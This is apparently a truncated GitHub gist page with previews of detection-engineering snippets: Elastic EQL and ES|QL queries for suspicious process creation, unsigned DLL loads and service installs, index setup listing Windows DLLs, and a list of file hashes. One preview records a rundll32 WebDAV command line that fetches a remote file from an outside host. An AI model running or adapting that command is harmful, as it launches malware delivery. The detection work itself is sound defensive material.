This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
98faaafd3b450d836415eff09da56591fe31c54b4a668498416537262f2cd4c6 | |
d5760da745c915753a1364a3d9762e75b503192327473bb3bda85282a532f4bc | |
ae67088e35d84034a56217bffe9aa3f830ea745b521432a6406106f446cfcee2 | |
c382b67f4330082877b179fa1d7178cb8261f7519b2bf46965e6cabcd4c943b4 | |
c7fb77d22e1d937220cc3a7527dd9eb6f5b663da81c830c67f1ba892a868ca27 | |
68864134a67842ac2f863dfd92ec6ad6567571a436663b0bceda9e2ef0222de2 | |
e8cbafcf196bb80ccb2249e8f6a18c02d8d67926a298165592c4ec742851749f | |
f67dd838b2a5fbb4739bd30ca721240f99f2f66e49c352aa600f2d443004c787 | |
159dc9de2d297a560eda6f1a1b861d4fe52a285aa475137fc32688ccde8de7e5 | |
f900d5bebd2241a0f1bf969c7c2ece6b6f53440d97ee3ddcd19566866a2dca18 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
"process": { | |
"args": [ | |
"rundll32.exe", | |
"C:\\WINDOWS\\system32\\davclnt.dll,DavSetCookie", | |
"brukjanesis.com@80", | |
"http://brukjanesis.com/TrdGallery/ResultTrd.bmp.url" | |
], | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
get-date |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// requires 4688 - process creation audit to be enabled | |
// EQL query | |
process where event.action == "created-process" and | |
not startswith~(winlog.event_data.TargetUserSid, winlog.event_data.SubjectUserSid) and | |
winlog.event_data.TargetUserSid : "S-1-5-21-*" and not winlog.event_data.TargetUserSid: "S-1-0-0" and | |
not process.parent.executable : ("?:\\Program Files\\*", "?:\\Program Files (x86)\\*", "?:\\Windows\\System32\\svchost.exe", "?:\\Windows\\System32\\runtimebroker.exe") | |
// ES|QL query - frequency based - 1 host with a unique parent and child proc running as different user identities | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// DLLs normally located in system32 but unsigned and loaded from elsewhere | |
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
// example ENRICH libs-policy creation steps | |
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c | |
ES|QL query: | |
from .ds-logs-endpoint.events.library-* | |
| where event.action == "load" and process.code_signature.status == "trusted" and dll.code_signature.status != "trusted" and |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// DLLs normally located in system32 but unsigned and loaded from elsewhere | |
// https://www.elastic.co/guide/en/elasticsearch/reference/master/esql-enrich-data.html | |
// example ENRICH libs-policy creation steps | |
https://gist.github.com/Samirbous/9f9c3237a0ada745e71cc2ba3425311c |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// create source index and define types | |
PUT /libs | |
{ | |
"mappings": { | |
"properties": { | |
"dll": { | |
"properties": { | |
"name": { | |
"type": "text", | |
"fields": { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PUT /native_dll1_index | |
{ | |
"mappings": { | |
"properties": { | |
"dll": { | |
"properties": { | |
"name": { | |
"type": "text", | |
"fields": { | |
"keyword": { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
PUT /libs/_doc/1?refresh=wait_for | |
{ | |
"dll.name": [ | |
"aadauthhelper.dll", | |
"aadcloudap.dll", | |
"aadjcsp.dll", | |
"aadtb.dll", | |
"aadwamextension.dll", | |
"aarsvc.dll", | |
"abovelockapphost.dll", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sequence by winlog.computer_name with maxspan=5m | |
[authentication where event.action == "logged-in" and | |
// non Elevated Token | |
winlog.event_data.ElevatedToken : "%%1843"] by winlog.event_data.TargetLogonId | |
[iam where event.action == "service-installed"] by winlog.event_data.SubjectLogonId | |
NewerOlder